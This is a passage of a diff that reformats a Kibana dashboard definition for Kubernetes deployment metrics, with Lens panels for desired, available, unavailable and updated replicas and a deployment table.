Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "58edcf0e-d21a-4dea-8b29-e5a8d9d4d738", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "58edcf0e-d21a-4dea-8b29-e5a8d9d4d738", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.10.2" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f89abbc1-82fb-4d41-a11a-cf433264e823", - "type": "index-pattern" + "panelIndex": "58edcf0e-d21a-4dea-8b29-e5a8d9d4d738", + "title": "Kubernetes Dashboards [Metrics Kubernetes]", + "type": "visualization", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f89abbc1-82fb-4d41-a11a-cf433264e823", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "611773bb-5ff9-4f08-ad80-de730b3bb8da", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f89abbc1-82fb-4d41-a11a-cf433264e823": { + "columnOrder": [ + "97c9bb01-da79-4cd4-b196-0842bbb528b9", + "f96be551-98dc-415f-9179-6d589e1d226d" + ], + "columns": { + "97c9bb01-da79-4cd4-b196-0842bbb528b9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.deployment.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - 
"id": "metrics-*", - "name": "611773bb-5ff9-4f08-ad80-de730b3bb8da", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "f89abbc1-82fb-4d41-a11a-cf433264e823": { - "columnOrder": [ - "97c9bb01-da79-4cd4-b196-0842bbb528b9", - "f96be551-98dc-415f-9179-6d589e1d226d" - ], - "columns": { - "97c9bb01-da79-4cd4-b196-0842bbb528b9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.deployment.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.deployment.name" - }, - "f96be551-98dc-415f-9179-6d589e1d226d": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.deployment.replicas.desired\": *" - }, - "isBucketed": false, - "label": "Replicas Desired", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.deployment.replicas.desired" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "611773bb-5ff9-4f08-ad80-de730b3bb8da", - "key": "data_stream.dataset", - "negate": false, - "params": 
{ - "query": "kubernetes.state_deployment" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_deployment" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "97c9bb01-da79-4cd4-b196-0842bbb528b9", - "collapseFn": "sum", - "layerId": "f89abbc1-82fb-4d41-a11a-cf433264e823", - "layerType": "data", - "metricAccessor": "f96be551-98dc-415f-9179-6d589e1d226d" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.deployment.name" }, - "title": "Deployment Replicas Desired [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "f96be551-98dc-415f-9179-6d589e1d226d": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.deployment.replicas.desired\": *" + }, + "isBucketed": false, + "label": "Replicas Desired", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.desired" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "c2551403-dc87-4486-bcac-0b949508082e", - "w": 12, - "x": 0, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "c2551403-dc87-4486-bcac-0b949508082e", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "611773bb-5ff9-4f08-ad80-de730b3bb8da", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_deployment" + }, + "type": "phrase" + }, + 
"query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_deployment" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "97c9bb01-da79-4cd4-b196-0842bbb528b9", + "collapseFn": "sum", + "layerId": "f89abbc1-82fb-4d41-a11a-cf433264e823", + "layerType": "data", + "metricAccessor": "f96be551-98dc-415f-9179-6d589e1d226d" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0f3d63e6-e7d7-45d7-acc1-13be66847b70", - "type": "index-pattern" + "title": "Deployment Replicas Desired [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "c2551403-dc87-4486-bcac-0b949508082e", + "w": 12, + "x": 0, + "y": 4 + }, + "panelIndex": "c2551403-dc87-4486-bcac-0b949508082e", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0f3d63e6-e7d7-45d7-acc1-13be66847b70", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "899d30db-ab00-4a6f-9323-d4232f23735e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0f3d63e6-e7d7-45d7-acc1-13be66847b70": { + "columnOrder": [ + "0e87c556-3850-42b1-83ea-f1117f30b514", + "68619d2a-8ca3-4fab-a401-b6afe82f0b34" + ], + "columns": { + "0e87c556-3850-42b1-83ea-f1117f30b514": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.deployment.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + 
"label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "899d30db-ab00-4a6f-9323-d4232f23735e", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "0f3d63e6-e7d7-45d7-acc1-13be66847b70": { - "columnOrder": [ - "0e87c556-3850-42b1-83ea-f1117f30b514", - "68619d2a-8ca3-4fab-a401-b6afe82f0b34" - ], - "columns": { - "0e87c556-3850-42b1-83ea-f1117f30b514": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.deployment.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.deployment.name" - }, - "68619d2a-8ca3-4fab-a401-b6afe82f0b34": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.deployment.replicas.available\": *" - }, - "isBucketed": false, - "label": "Replicas Available ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.deployment.replicas.available" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - 
"field": "data_stream.dataset", - "index": "899d30db-ab00-4a6f-9323-d4232f23735e", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_deployment" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_deployment" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "0e87c556-3850-42b1-83ea-f1117f30b514", - "collapseFn": "sum", - "layerId": "0f3d63e6-e7d7-45d7-acc1-13be66847b70", - "layerType": "data", - "metricAccessor": "68619d2a-8ca3-4fab-a401-b6afe82f0b34" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.deployment.name" }, - "title": "Deployment Replicas Available [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "68619d2a-8ca3-4fab-a401-b6afe82f0b34": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.deployment.replicas.available\": *" + }, + "isBucketed": false, + "label": "Replicas Available ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.available" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "51e54a67-b167-49a2-95e6-e758a953a7e8", - "w": 12, - "x": 12, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "51e54a67-b167-49a2-95e6-e758a953a7e8", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": 
"899d30db-ab00-4a6f-9323-d4232f23735e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_deployment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_deployment" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "0e87c556-3850-42b1-83ea-f1117f30b514", + "collapseFn": "sum", + "layerId": "0f3d63e6-e7d7-45d7-acc1-13be66847b70", + "layerType": "data", + "metricAccessor": "68619d2a-8ca3-4fab-a401-b6afe82f0b34" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6", - "type": "index-pattern" + "title": "Deployment Replicas Available [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "51e54a67-b167-49a2-95e6-e758a953a7e8", + "w": 12, + "x": 12, + "y": 4 + }, + "panelIndex": "51e54a67-b167-49a2-95e6-e758a953a7e8", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "78f09db9-67c3-40f1-93c7-9ba2b8ca8299", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6": { + "columnOrder": [ + "7f1db361-8082-4f8d-985b-21e2a73c7073", + "f1c1c36b-5bdc-4755-bd47-e24fcfd58c22" + ], + "columns": { + "7f1db361-8082-4f8d-985b-21e2a73c7073": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.deployment.name", + "operationType": "terms", + "params": { + 
"exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "78f09db9-67c3-40f1-93c7-9ba2b8ca8299", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6": { - "columnOrder": [ - "7f1db361-8082-4f8d-985b-21e2a73c7073", - "f1c1c36b-5bdc-4755-bd47-e24fcfd58c22" - ], - "columns": { - "7f1db361-8082-4f8d-985b-21e2a73c7073": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.deployment.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.deployment.name" - }, - "f1c1c36b-5bdc-4755-bd47-e24fcfd58c22": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.deployment.replicas.unavailable\": *" - }, - "isBucketed": false, - "label": "Replicas Unavailable ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.deployment.replicas.unavailable" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - 
"textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "78f09db9-67c3-40f1-93c7-9ba2b8ca8299", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_deployment" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_deployment" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "7f1db361-8082-4f8d-985b-21e2a73c7073", - "collapseFn": "sum", - "layerId": "0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6", - "layerType": "data", - "metricAccessor": "f1c1c36b-5bdc-4755-bd47-e24fcfd58c22" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.deployment.name" }, - "title": "Deployment Replicas Unavailable [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "f1c1c36b-5bdc-4755-bd47-e24fcfd58c22": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.deployment.replicas.unavailable\": *" + }, + "isBucketed": false, + "label": "Replicas Unavailable ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.unavailable" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "934fbda9-c201-4539-bb6d-95c416b9d392", - "w": 12, - "x": 24, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "934fbda9-c201-4539-bb6d-95c416b9d392", - "type": "lens", - "version": "8.10.2" + "textBased": { + 
"layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "78f09db9-67c3-40f1-93c7-9ba2b8ca8299", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_deployment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_deployment" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "7f1db361-8082-4f8d-985b-21e2a73c7073", + "collapseFn": "sum", + "layerId": "0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6", + "layerType": "data", + "metricAccessor": "f1c1c36b-5bdc-4755-bd47-e24fcfd58c22" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-006a132f-0e92-4aa2-818e-bc6aef899777", - "type": "index-pattern" + "title": "Deployment Replicas Unavailable [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "934fbda9-c201-4539-bb6d-95c416b9d392", + "w": 12, + "x": 24, + "y": 4 + }, + "panelIndex": "934fbda9-c201-4539-bb6d-95c416b9d392", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-006a132f-0e92-4aa2-818e-bc6aef899777", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ae122104-dfc0-48a6-b40c-94109bc57cbf", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "006a132f-0e92-4aa2-818e-bc6aef899777": { + "columnOrder": [ + "5136cbeb-0565-4aa8-afe0-c951c8454d1f", + "b3213d52-30f4-4255-b372-fe7d0d1a0919" + ], + "columns": { + 
"5136cbeb-0565-4aa8-afe0-c951c8454d1f": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.deployment.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "ae122104-dfc0-48a6-b40c-94109bc57cbf", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "006a132f-0e92-4aa2-818e-bc6aef899777": { - "columnOrder": [ - "5136cbeb-0565-4aa8-afe0-c951c8454d1f", - "b3213d52-30f4-4255-b372-fe7d0d1a0919" - ], - "columns": { - "5136cbeb-0565-4aa8-afe0-c951c8454d1f": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.deployment.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.deployment.name" - }, - "b3213d52-30f4-4255-b372-fe7d0d1a0919": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.deployment.replicas.updated\": *" - }, - "isBucketed": false, - "label": "Replicas Updated", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - 
"sourceField": "kubernetes.deployment.replicas.updated" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "ae122104-dfc0-48a6-b40c-94109bc57cbf", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_deployment" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_deployment" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "5136cbeb-0565-4aa8-afe0-c951c8454d1f", - "collapseFn": "sum", - "layerId": "006a132f-0e92-4aa2-818e-bc6aef899777", - "layerType": "data", - "metricAccessor": "b3213d52-30f4-4255-b372-fe7d0d1a0919" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.deployment.name" }, - "title": "Deployment Replicas Updated [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "b3213d52-30f4-4255-b372-fe7d0d1a0919": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.deployment.replicas.updated\": *" + }, + "isBucketed": false, + "label": "Replicas Updated", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.updated" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6", - "w": 12, - "x": 36, - "y": 
4 + "indexpattern": { + "layers": {} }, - "panelIndex": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "ae122104-dfc0-48a6-b40c-94109bc57cbf", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_deployment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_deployment" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "5136cbeb-0565-4aa8-afe0-c951c8454d1f", + "collapseFn": "sum", + "layerId": "006a132f-0e92-4aa2-818e-bc6aef899777", + "layerType": "data", + "metricAccessor": "b3213d52-30f4-4255-b372-fe7d0d1a0919" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ce8436e0-8192-447a-b427-103026d8aa4b", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31": { - "columnOrder": [ - "28ea2553-630d-4917-b778-52da2d5bba86", - "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625", - "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4", - "9b5ed643-7572-4d3b-a9af-6265b3a5a515" - ], - "columns": { - "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.deployment.replicas.unavailable: *" - }, - "isBucketed": false, - "label": "Replicas Unavailable", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": 
"kubernetes.deployment.replicas.unavailable" - }, - "28ea2553-630d-4917-b778-52da2d5bba86": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Deployment Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "kubernetes.deployment.name" - }, - "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.deployment.replicas.available: *" - }, - "isBucketed": false, - "label": "Replicas Available", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.deployment.replicas.available" - }, - "9b5ed643-7572-4d3b-a9af-6265b3a5a515": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Replicas Desired", - "operationType": "median", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.deployment.replicas.desired" - } - }, - "incompleteColumns": {} - } - } - } + "title": "Deployment Replicas Updated [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6", + "w": 12, + "x": 36, + "y": 4 + }, + "panelIndex": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ce8436e0-8192-447a-b427-103026d8aa4b", + "type": "index-pattern" + } + ], + "state": { + 
"adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31": { + "columnOrder": [ + "28ea2553-630d-4917-b778-52da2d5bba86", + "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625", + "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4", + "9b5ed643-7572-4d3b-a9af-6265b3a5a515" + ], + "columns": { + "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.deployment.replicas.unavailable: *" + }, + "isBucketed": false, + "label": "Replicas Unavailable", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.unavailable" + }, + "28ea2553-630d-4917-b778-52da2d5bba86": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Deployment Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "ce8436e0-8192-447a-b427-103026d8aa4b", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_deployment" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_deployment" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625", - 
